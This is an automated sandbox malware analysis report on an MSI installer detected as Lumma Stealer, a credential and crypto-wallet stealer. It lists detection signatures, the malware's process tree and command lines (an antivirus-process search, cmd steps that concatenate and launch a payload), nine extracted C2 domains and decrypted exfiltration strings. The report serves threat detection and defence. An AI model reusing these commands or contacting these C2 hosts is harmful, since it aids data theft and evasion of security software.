Edit tour

Windows Analysis Report
NB4EASbynx.msi

Overview

General Information

Sample name:	NB4EASbynx.msi renamed because original name is a hash value
Original sample name:	3b48c90d4a283982ced898df9570894b.msi
Analysis ID:	1481471
MD5:	3b48c90d4a283982ced898df9570894b
SHA1:	ed07663c40d54fff42af99c2969971a3493f1bf7
SHA256:	3ed535bbcd9d4980ec8bc60cd64804e9c9617b7d88723d3b05e6ad35821c3fe7
Tags:	LummaStealermsi
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for submitted file

Sigma detected: Search for Antivirus process

Yara detected LummaC Stealer

C2 URLs / IPs found in malware configuration

Drops PE files with a suspicious file extension

Drops large PE files

Found API chain indicative of debugger detection

Found many strings related to Crypto-Wallets (likely being stolen)

Found stalling execution ending in API Sleep call

Injects a PE file into a foreign processes

LummaC encrypted strings found

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks for available system drives (often done to infect USB drives)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

File is packed with WinRar

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for user specific document files

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: Suspicious Copy From or To System Directory

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

msiexec.exe (PID: 5584 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\NB4EASbynx.msi" MD5: E5DA170027542E25EDE42FC54C929077)

MSI53B9.tmp (PID: 3212 cmdline: "C:\Users\user\AppData\Local\Temp\MSI53B9.tmp" -pqwerty2023 -s1 MD5: 689E01A34A731C6F051E39CD55FB71AD)

SymposiumTaiwan.exe (PID: 1020 cmdline: "C:\Users\user\Desktop\SymposiumTaiwan.exe" MD5: 9A721DDFD6C94D81EF78858A85F1083A)

cmd.exe (PID: 6792 cmdline: "C:\Windows\System32\cmd.exe" /k copy Open Open.cmd & Open.cmd & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 3500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 6772 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 5112 cmdline: findstr /I "wrsa.exe opssvc.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

tasklist.exe (PID: 5908 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 4544 cmdline: findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 7156 cmdline: cmd /c md 558563 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

findstr.exe (PID: 1812 cmdline: findstr /V "cbsinchhavefcc" Basketball MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 4896 cmdline: cmd /c copy /b Upc + Beverages + Hero + Displaying + Version + Fm + Emotions 558563\k MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Dicks.pif (PID: 2836 cmdline: 558563\Dicks.pif 558563\k MD5: 6EE7DDEBFF0A2B78C7AC30F6E00D1D11)

Dicks.pif (PID: 3248 cmdline: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif MD5: 6EE7DDEBFF0A2B78C7AC30F6E00D1D11)

timeout.exe (PID: 5224 cmdline: timeout 5 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

msiexec.exe (PID: 3896 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)

msiexec.exe (PID: 3568 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 4C0B4EE6A62E23CFF044B1F01FFADBEC C MD5: 9D09DC1EDA745A5F87553048E57620CF)

msiexec.exe (PID: 6860 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 6E4C0896962209942EF6224878A6EC23 MD5: 9D09DC1EDA745A5F87553048E57620CF)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/ https://censys.com/a-beginners-guide-to-hunting-open-directories/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["indexterityszcoxp.shop", "lariatedzugspd.shop", "callosallsaospz.shop", "outpointsozp.shop", "liernessfornicsa.shop", "upknittsoappz.shop", "shepherdlyopzc.shop", "unseaffarignsk.shop", "warrantelespsz.shop"], "Build id": "DlgY9i--"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000017.00000003.3156346560.00000000011C6000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000017.00000003.3198982673.00000000011C6000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000017.00000003.3156175797.00000000011C6000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000017.00000003.3155203388.00000000011C3000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000017.00000003.3182152456.00000000011C5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000017.00000003.3179568692.00000000011C3000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000017.00000003.3182152456.0000000001173000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000017.00000003.3182027461.00000000011C3000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000017.00000003.3196037635.00000000011C5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000017.00000003.3179989281.00000000011C5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Dicks.pif PID: 3248	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: Dicks.pif PID: 3248	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Dicks.pif PID: 3248	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 9 entries

Sigma Signatures

System Summary

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: 558563\Dicks.pif 558563\k, CommandLine: 558563\Dicks.pif 558563\k, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k copy Open Open.cmd & Open.cmd & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6792, ParentProcessName: cmd.exe, ProcessCommandLine: 558563\Dicks.pif 558563\k, ProcessId: 2836, ProcessName: Dicks.pif

Sigma detected: Suspicious Copy From or To System Directory

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /k copy Open Open.cmd & Open.cmd & exit, CommandLine: "C:\Windows\System32\cmd.exe" /k copy Open Open.cmd & Open.cmd & exit, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\SymposiumTaiwan.exe" , ParentImage: C:\Users\user\Desktop\SymposiumTaiwan.exe, ParentProcessId: 1020, ParentProcessName: SymposiumTaiwan.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /k copy Open Open.cmd & Open.cmd & exit, ProcessId: 6792, ProcessName: cmd.exe

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Search for Antivirus process

Source: Process started

Author: Joe Security: Data: Command: findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" , CommandLine: findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k copy Open Open.cmd & Open.cmd & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6792, ParentProcessName: cmd.exe, ProcessCommandLine: findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" , ProcessId: 4544, ProcessName: findstr.exe

Snort Signatures

⊘No Snort rule has matched

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update - Source IP: 192.168.2.6 - Destination IP: 188.114.96.3

Timestamp:	2024-07-25T09:54:05.626887+0200
SID:	2028371
Source Port:	49722
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - Possible Malware - Fake Firefox Font Update - Source IP: 192.168.2.6 - Destination IP: 188.114.96.3

Timestamp:	2024-07-25T09:54:09.471784+0200
SID:	2028371
Source Port:	49725
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.6 - Destination IP: 188.114.96.3

Timestamp:	2024-07-25T09:54:07.393267+0200
SID:	2054653
Source Port:	49723
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration - Source IP: 192.168.2.6 - Destination IP: 188.114.96.3

Timestamp:	2024-07-25T09:54:08.625645+0200
SID:	2048094
Source Port:	49724
Destination Port:	443
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Possible Malware - Fake Firefox Font Update - Source IP: 192.168.2.6 - Destination IP: 188.114.96.3

Timestamp:	2024-07-25T09:54:13.980250+0200
SID:	2028371
Source Port:	49728
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.6 - Destination IP: 188.114.96.3

Timestamp:	2024-07-25T09:54:06.322611+0200
SID:	2054653
Source Port:	49722
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET JA3 Hash - Possible Malware - Fake Firefox Font Update - Source IP: 192.168.2.6 - Destination IP: 188.114.96.3

Timestamp:	2024-07-25T09:54:08.313743+0200
SID:	2028371
Source Port:	49724
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 20.114.59.183 - Destination IP: 192.168.2.6

Timestamp:	2024-07-25T09:53:23.686115+0200
SID:	2022930
Source Port:	443
Destination Port:	49718
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET JA3 Hash - Possible Malware - Fake Firefox Font Update - Source IP: 192.168.2.6 - Destination IP: 188.114.96.3

Timestamp:	2024-07-25T09:54:06.823663+0200
SID:	2028371
Source Port:	49723
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - Possible Malware - Fake Firefox Font Update - Source IP: 192.168.2.6 - Destination IP: 188.114.96.3

Timestamp:	2024-07-25T09:54:17.088274+0200
SID:	2028371
Source Port:	49729
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - Possible Malware - Fake Firefox Font Update - Source IP: 192.168.2.6 - Destination IP: 188.114.96.3

Timestamp:	2024-07-25T09:54:10.700182+0200
SID:	2028371
Source Port:	49726
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.6 - Destination IP: 188.114.96.3

Timestamp:	2024-07-25T09:54:18.413471+0200
SID:	2054653
Source Port:	49729
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 20.114.59.183 - Destination IP: 192.168.2.6

Timestamp:	2024-07-25T09:52:45.853828+0200
SID:	2022930
Source Port:	443
Destination Port:	49712
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET JA3 Hash - Possible Malware - Fake Firefox Font Update - Source IP: 192.168.2.6 - Destination IP: 188.114.96.3

Timestamp:	2024-07-25T09:54:12.517765+0200
SID:	2028371
Source Port:	49727
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://warrantelespsz.shop:443/api	Avira URL Cloud: Label: malware
Source: https://warrantelespsz.shop/api	Avira URL Cloud: Label: malware

Found malware configuration

Source: 23.2.Dicks.pif.e60000.1.raw.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["indexterityszcoxp.shop", "lariatedzugspd.shop", "callosallsaospz.shop", "outpointsozp.shop", "liernessfornicsa.shop", "upknittsoappz.shop", "shepherdlyopzc.shop", "unseaffarignsk.shop", "warrantelespsz.shop"], "Build id": "DlgY9i--"}

Multi AV Scanner detection for submitted file

Source: NB4EASbynx.msi

ReversingLabs: Detection: 18%

Sample uses string decryption to hide its real strings

Source: 00000013.00000003.3131801499.00000000043FC000.00000004.00000800.00020000.00000000.sdmp	String decryptor: indexterityszcoxp.shop
Source: 00000013.00000003.3131801499.00000000043FC000.00000004.00000800.00020000.00000000.sdmp	String decryptor: lariatedzugspd.shop
Source: 00000013.00000003.3131801499.00000000043FC000.00000004.00000800.00020000.00000000.sdmp	String decryptor: callosallsaospz.shop
Source: 00000013.00000003.3131801499.00000000043FC000.00000004.00000800.00020000.00000000.sdmp	String decryptor: outpointsozp.shop
Source: 00000013.00000003.3131801499.00000000043FC000.00000004.00000800.00020000.00000000.sdmp	String decryptor: liernessfornicsa.shop
Source: 00000013.00000003.3131801499.00000000043FC000.00000004.00000800.00020000.00000000.sdmp	String decryptor: upknittsoappz.shop
Source: 00000013.00000003.3131801499.00000000043FC000.00000004.00000800.00020000.00000000.sdmp	String decryptor: shepherdlyopzc.shop
Source: 00000013.00000003.3131801499.00000000043FC000.00000004.00000800.00020000.00000000.sdmp	String decryptor: unseaffarignsk.shop
Source: 00000013.00000003.3131801499.00000000043FC000.00000004.00000800.00020000.00000000.sdmp	String decryptor: warrantelespsz.shop
Source: 00000013.00000003.3131801499.00000000043FC000.00000004.00000800.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000013.00000003.3131801499.00000000043FC000.00000004.00000800.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000013.00000003.3131801499.00000000043FC000.00000004.00000800.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000013.00000003.3131801499.00000000043FC000.00000004.00000800.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000013.00000003.3131801499.00000000043FC000.00000004.00000800.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000013.00000003.3131801499.00000000043FC000.00000004.00000800.00020000.00000000.sdmp	String decryptor: DlgY9i--

Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif

Code function: 23_2_00E7673F CryptUnprotectData,

23_2_00E7673F

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49727 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49729 version: TLS 1.2

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: MSI53B9.tmp, 00000004.00000000.2201198694.00000000008A0000.00000002.00000001.01000000.00000003.sdmp, MSI53B9.tmp, 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmp, NB4EASbynx.msi, 68e8f1.msi.2.dr, MSI53B9.tmp.1.dr, 68e8ef.msi.2.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: NB4EASbynx.msi, MSIEA95.tmp.2.dr, MSIC706.tmp.1.dr, MSI52AE.tmp.1.dr, 68e8f1.msi.2.dr, MSI527E.tmp.1.dr, MSI523E.tmp.1.dr, MSIEAB6.tmp.2.dr, MSI4F6E.tmp.1.dr, MSI5124.tmp.1.dr

Source: C:\Windows\System32\msiexec.exe	File opened: z:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: x:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: v:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: t:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: r:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: p:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: n:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: l:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: j:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: h:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: f:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: b:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: y:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: w:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: u:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: s:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: q:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: o:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: m:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: k:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: i:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: g:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: e:	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: a:	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Code function: 4_2_0087A273 FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	4_2_0087A273
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Code function: 4_2_0088A537 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	4_2_0088A537
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Code function: 4_2_00897D78 FindFirstFileExA,	4_2_00897D78
Source: C:\Users\user\Desktop\SymposiumTaiwan.exe	Code function: 8_2_00406301 FindFirstFileW,FindClose,	8_2_00406301
Source: C:\Users\user\Desktop\SymposiumTaiwan.exe	Code function: 8_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	8_2_00406CC7
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 19_2_00094005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	19_2_00094005
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 19_2_0009494A GetFileAttributesW,FindFirstFileW,FindClose,	19_2_0009494A
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 19_2_0009FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	19_2_0009FA36
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 19_2_0009C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	19_2_0009C2FF
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 19_2_0009CD14 FindFirstFileW,FindClose,	19_2_0009CD14
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 19_2_0009CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	19_2_0009CD9F
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 19_2_0009F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	19_2_0009F5D8
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 19_2_0009F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	19_2_0009F735
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 19_2_00093CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	19_2_00093CE2
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_00094005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	23_2_00094005
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_0009C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	23_2_0009C2FF
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_0009494A GetFileAttributesW,FindFirstFileW,FindClose,	23_2_0009494A
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_0009CD14 FindFirstFileW,FindClose,	23_2_0009CD14
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_0009CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	23_2_0009CD9F
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_0009F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	23_2_0009F5D8
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_0009F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	23_2_0009F735
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_0009FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	23_2_0009FA36
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_00093CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	23_2_00093CE2

Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 4x nop then mov ecx, dword ptr [esp+00000890h]	23_2_00E7E2FC
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 4x nop then mov eax, dword ptr [esp+18h]	23_2_00E994D5
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 4x nop then movzx ebx, dx	23_2_00E855E0
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 4x nop then mov eax, dword ptr [esi+18h]	23_2_00E855E0
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 4x nop then mov ecx, dword ptr [esp]	23_2_00E9C5E0
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 4x nop then jmp ecx	23_2_00E75550
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 4x nop then mov ecx, dword ptr [esp]	23_2_00E806FC
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 4x nop then mov byte ptr [edi], al	23_2_00E867C8
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 4x nop then mov eax, dword ptr [esi+18h]	23_2_00E867C8
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 4x nop then cmp dword ptr [eax+esi*8], 11081610h	23_2_00E808D4
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 4x nop then mov word ptr [eax], cx	23_2_00E779F0
